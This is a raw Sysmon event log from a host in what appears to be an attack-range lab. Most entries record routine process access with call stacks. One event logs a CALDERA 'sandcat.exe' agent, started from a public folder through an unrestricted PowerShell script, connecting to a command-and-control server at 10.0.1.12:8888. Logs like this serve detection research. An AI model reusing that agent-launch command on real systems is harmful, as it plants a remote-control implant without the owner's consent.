10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.822{08A6967A-4286-6000-0A00-000000009A01}8441184C:\Windows\system32\services.exe{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.825{08A6967A-428D-6000-2400-000000009A01}3016C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4286-6000-0B00-000000009A01}8521096C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.806{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.791{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.650{08A6967A-4289-6000-1C00-000000009A01}23042420C:\Windows\system32\conhost.exe{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.650{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.650{08A6967A-4289-6000-1800-000000009A01}21562800C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fb182516(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa623120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa622df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fb0d46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa5e3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa641e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa6254bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa6254bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa62534c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa6172d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa623804(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa6233a0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa623120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa622df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fb0d46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa609c52(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+fa609222(wow64) 154100x80000000000000001130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.608{08A6967A-428D-6000-2300-000000009A01}2980C:\Users\Public\sandcat.exe-----"C:\Users\Public\sandcat.exe" -server http://10.0.1.12:8888 -group my_group -vC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=4AAC4143487A1888FC416C8D6AAA28BF,SHA256=A98ED4833C64FF96AD74F1A76358B1FB947C7BC61502E51624AFE6944982EC93,IMPHASH=1CD364A9E949D5ECEBD6C614E64BC545{08A6967A-4289-6000-1800-000000009A01}2156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Unrestricted -NonInteractive -File C:\caldera_agent.ps1 10341000x80000000000000001129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:33.650{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-428B-6000-2200-000000009A01}2828C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 